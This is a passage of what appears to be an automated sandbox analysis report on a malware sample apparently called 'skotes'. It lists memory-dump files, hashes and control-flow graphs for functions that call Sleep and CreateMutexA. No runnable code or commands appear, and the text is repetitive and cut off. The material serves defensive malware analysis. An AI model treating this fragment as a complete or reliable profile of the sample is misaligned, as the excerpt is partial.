                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797152074.0000000000279000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797167103.000000000027B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797181871.000000000027D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797181871.0000000000285000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797227965.000000000028B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797250428.000000000028C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797274904.000000000028E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797289779.000000000028F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797313862.000000000029A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797336491.000000000029E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797360786.00000000002B7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797382902.00000000002C6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797401968.00000000002C7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797420486.00000000002CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797442450.00000000002E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797461001.00000000002E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797479757.00000000002EE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797498202.00000000002EF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797520647.00000000002F0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797543996.00000000002F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797563899.00000000002F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797591340.00000000002FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797614702.0000000000305000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797634362.0000000000308000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797656115.0000000000309000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797691125.0000000000310000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797717114.0000000000318000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797801740.0000000000319000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797840131.000000000031A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797864975.0000000000322000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797886304.0000000000332000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797909176.0000000000333000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797934254.0000000000334000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797955803.0000000000336000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797955803.000000000035E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798011058.0000000000375000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798031229.0000000000376000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798053092.000000000038B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798076382.000000000038C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798101812.0000000000391000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798122885.0000000000393000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798147218.00000000003A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798166267.00000000003A3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_90000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1464230837-0
                                                                                                                                                                                                                                                  • Opcode ID: c3d37d3fc432369138eca1b22b64c01fac1014b7e963b10eecdd3947fe21111f
                                                                                                                                                                                                                                                  • Instruction ID: bef3001c01f0e3925b234e5fa0614be2090551c5832d6927ec5336b228f7ffff
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c3d37d3fc432369138eca1b22b64c01fac1014b7e963b10eecdd3947fe21111f
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CD312731B402009BEF189BBCDCC9BADB762EBC3314F244618E0149B6D6DBB5D9809792
                                                                                                                                                                                                                                                  Function 0009A54D Relevance: 3.1, APIs: 2, Instructions: 132sleepsynchronizationCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 164 9a54d-9a56d 168 9a59b-9a5b7 164->168 169 9a56f-9a57b 164->169 172 9a5b9-9a5c5 168->172 173 9a5e5-9a604 168->173 170 9a57d-9a58b 169->170 171 9a591-9a598 call ad663 169->171 170->171 178 9a944-9a994 call c6c6a * 3 Sleep CreateMutexA 170->178 171->168 174 9a5db-9a5e2 call ad663 172->174 175 9a5c7-9a5d5 172->175 176 9a632-9a916 call a80c0 173->176 177 9a606-9a612 173->177 174->173 175->174 175->178 181 9a628-9a62f call ad663 177->181 182 9a614-9a622 177->182 198 9a9a7-9a9a8 178->198 199 9a996-9a998 178->199 181->176 182->178 182->181 199->198 200 9a99a-9a9a5 199->200 200->198
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00000064), ref: 0009A963
                                                                                                                                                                                                                                                  • CreateMutexA.KERNELBASE(00000000,00000000,000F3254), ref: 0009A981
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.1796827623.0000000000091000.00000040.00000001.01000000.00000007.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1796755859.0000000000090000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1796827623.00000000000F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1796920266.00000000000F9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1796979923.00000000000FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797011577.0000000000107000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797109293.0000000000268000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797129613.000000000026B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797152074.0000000000279000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797167103.000000000027B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797181871.000000000027D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797181871.0000000000285000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797227965.000000000028B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797250428.000000000028C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797274904.000000000028E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797289779.000000000028F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797313862.000000000029A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797336491.000000000029E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797360786.00000000002B7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797382902.00000000002C6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797401968.00000000002C7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797420486.00000000002CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797442450.00000000002E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797461001.00000000002E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797479757.00000000002EE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797498202.00000000002EF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797520647.00000000002F0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797543996.00000000002F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797563899.00000000002F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797591340.00000000002FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797614702.0000000000305000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797634362.0000000000308000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797656115.0000000000309000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797691125.0000000000310000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797717114.0000000000318000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797801740.0000000000319000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797840131.000000000031A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797864975.0000000000322000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797886304.0000000000332000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797909176.0000000000333000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797934254.0000000000334000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797955803.0000000000336000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797955803.000000000035E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798011058.0000000000375000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798031229.0000000000376000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798053092.000000000038B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798076382.000000000038C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798101812.0000000000391000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798122885.0000000000393000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798147218.00000000003A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798166267.00000000003A3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_90000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1464230837-0
                                                                                                                                                                                                                                                  • Opcode ID: 9ab93830b2f8df8dc1d023ce40ef9dc502cee6fce2183f1b479d9e02f1837c2c
                                                                                                                                                                                                                                                  • Instruction ID: b82fe308eba183891bf99784ac721444e3ba8257c64716a06a673d969381e404
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9ab93830b2f8df8dc1d023ce40ef9dc502cee6fce2183f1b479d9e02f1837c2c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 883118317002049BEF18DBB8DCC9BADB7A2EBC7314F248618E014DB6D2C775D9809792
                                                                                                                                                                                                                                                  Function 0009A682 Relevance: 3.1, APIs: 2, Instructions: 131sleepsynchronizationCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 202 9a682-9a6a2 206 9a6d0-9a6ec 202->206 207 9a6a4-9a6b0 202->207 208 9a71a-9a739 206->208 209 9a6ee-9a6fa 206->209 210 9a6b2-9a6c0 207->210 211 9a6c6-9a6cd call ad663 207->211 215 9a73b-9a747 208->215 216 9a767-9a916 call a80c0 208->216 213 9a6fc-9a70a 209->213 214 9a710-9a717 call ad663 209->214 210->211 217 9a949-9a994 call c6c6a * 2 Sleep CreateMutexA 210->217 211->206 213->214 213->217 214->208 221 9a749-9a757 215->221 222 9a75d-9a764 call ad663 215->222 234 9a9a7-9a9a8 217->234 235 9a996-9a998 217->235 221->217 221->222 222->216 235->234 236 9a99a-9a9a5 235->236 236->234
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00000064), ref: 0009A963
                                                                                                                                                                                                                                                  • CreateMutexA.KERNELBASE(00000000,00000000,000F3254), ref: 0009A981
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.1796827623.0000000000091000.00000040.00000001.01000000.00000007.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1796755859.0000000000090000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1796827623.00000000000F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1796920266.00000000000F9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1796979923.00000000000FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797011577.0000000000107000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797109293.0000000000268000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797129613.000000000026B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797152074.0000000000279000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797167103.000000000027B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797181871.000000000027D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797181871.0000000000285000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797227965.000000000028B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797250428.000000000028C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797274904.000000000028E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797289779.000000000028F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797313862.000000000029A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797336491.000000000029E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797360786.00000000002B7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797382902.00000000002C6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797401968.00000000002C7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797420486.00000000002CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797442450.00000000002E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797461001.00000000002E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797479757.00000000002EE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797498202.00000000002EF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797520647.00000000002F0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797543996.00000000002F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797563899.00000000002F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797591340.00000000002FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797614702.0000000000305000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797634362.0000000000308000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797656115.0000000000309000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797691125.0000000000310000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797717114.0000000000318000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797801740.0000000000319000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797840131.000000000031A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797864975.0000000000322000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797886304.0000000000332000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797909176.0000000000333000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797934254.0000000000334000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797955803.0000000000336000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797955803.000000000035E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798011058.0000000000375000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798031229.0000000000376000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798053092.000000000038B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798076382.000000000038C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798101812.0000000000391000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798122885.0000000000393000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798147218.00000000003A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798166267.00000000003A3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_90000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1464230837-0
                                                                                                                                                                                                                                                  • Opcode ID: 4f7e3e477aaa9276adb7acb83a3d21e2fdb9a47240160439094df34a906a4d81
                                                                                                                                                                                                                                                  • Instruction ID: 647d8f45738e4a55ac2c8ff5c4fb7d57f3bae251080b0e545453589847ce93fb
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4f7e3e477aaa9276adb7acb83a3d21e2fdb9a47240160439094df34a906a4d81
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7B3116317042449BEF18DBBCDC89BADB7B2EB87324F248618E014D76D2C775D9809792
                                                                                                                                                                                                                                                  Function 00099ADC Relevance: 3.1, APIs: 2, Instructions: 107sleepsynchronizationCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 238 99adc-99ae8 239 99aea-99af8 238->239 240 99afe-99d91 call ad663 call a7a00 call 95c10 call 98b30 call a8220 call a7a00 call 95c10 call 98b30 call a8220 238->240 239->240 242 9a917 239->242 244 9a953-9a994 Sleep CreateMutexA 242->244 245 9a917 call c6c6a 242->245 250 9a9a7-9a9a8 244->250 251 9a996-9a998 244->251 245->244 251->250 253 9a99a-9a9a5 251->253 253->250
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00000064), ref: 0009A963
                                                                                                                                                                                                                                                  • CreateMutexA.KERNELBASE(00000000,00000000,000F3254), ref: 0009A981
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.1796827623.0000000000091000.00000040.00000001.01000000.00000007.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1796755859.0000000000090000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1796827623.00000000000F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1796920266.00000000000F9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1796979923.00000000000FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797011577.0000000000107000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797109293.0000000000268000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797129613.000000000026B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797152074.0000000000279000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797167103.000000000027B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797181871.000000000027D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797181871.0000000000285000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797227965.000000000028B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797250428.000000000028C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797274904.000000000028E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797289779.000000000028F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797313862.000000000029A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797336491.000000000029E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797360786.00000000002B7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797382902.00000000002C6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797401968.00000000002C7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797420486.00000000002CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797442450.00000000002E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797461001.00000000002E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797479757.00000000002EE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797498202.00000000002EF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797520647.00000000002F0000.00000080.00000001.01000000.00000007.sdmpDownload File
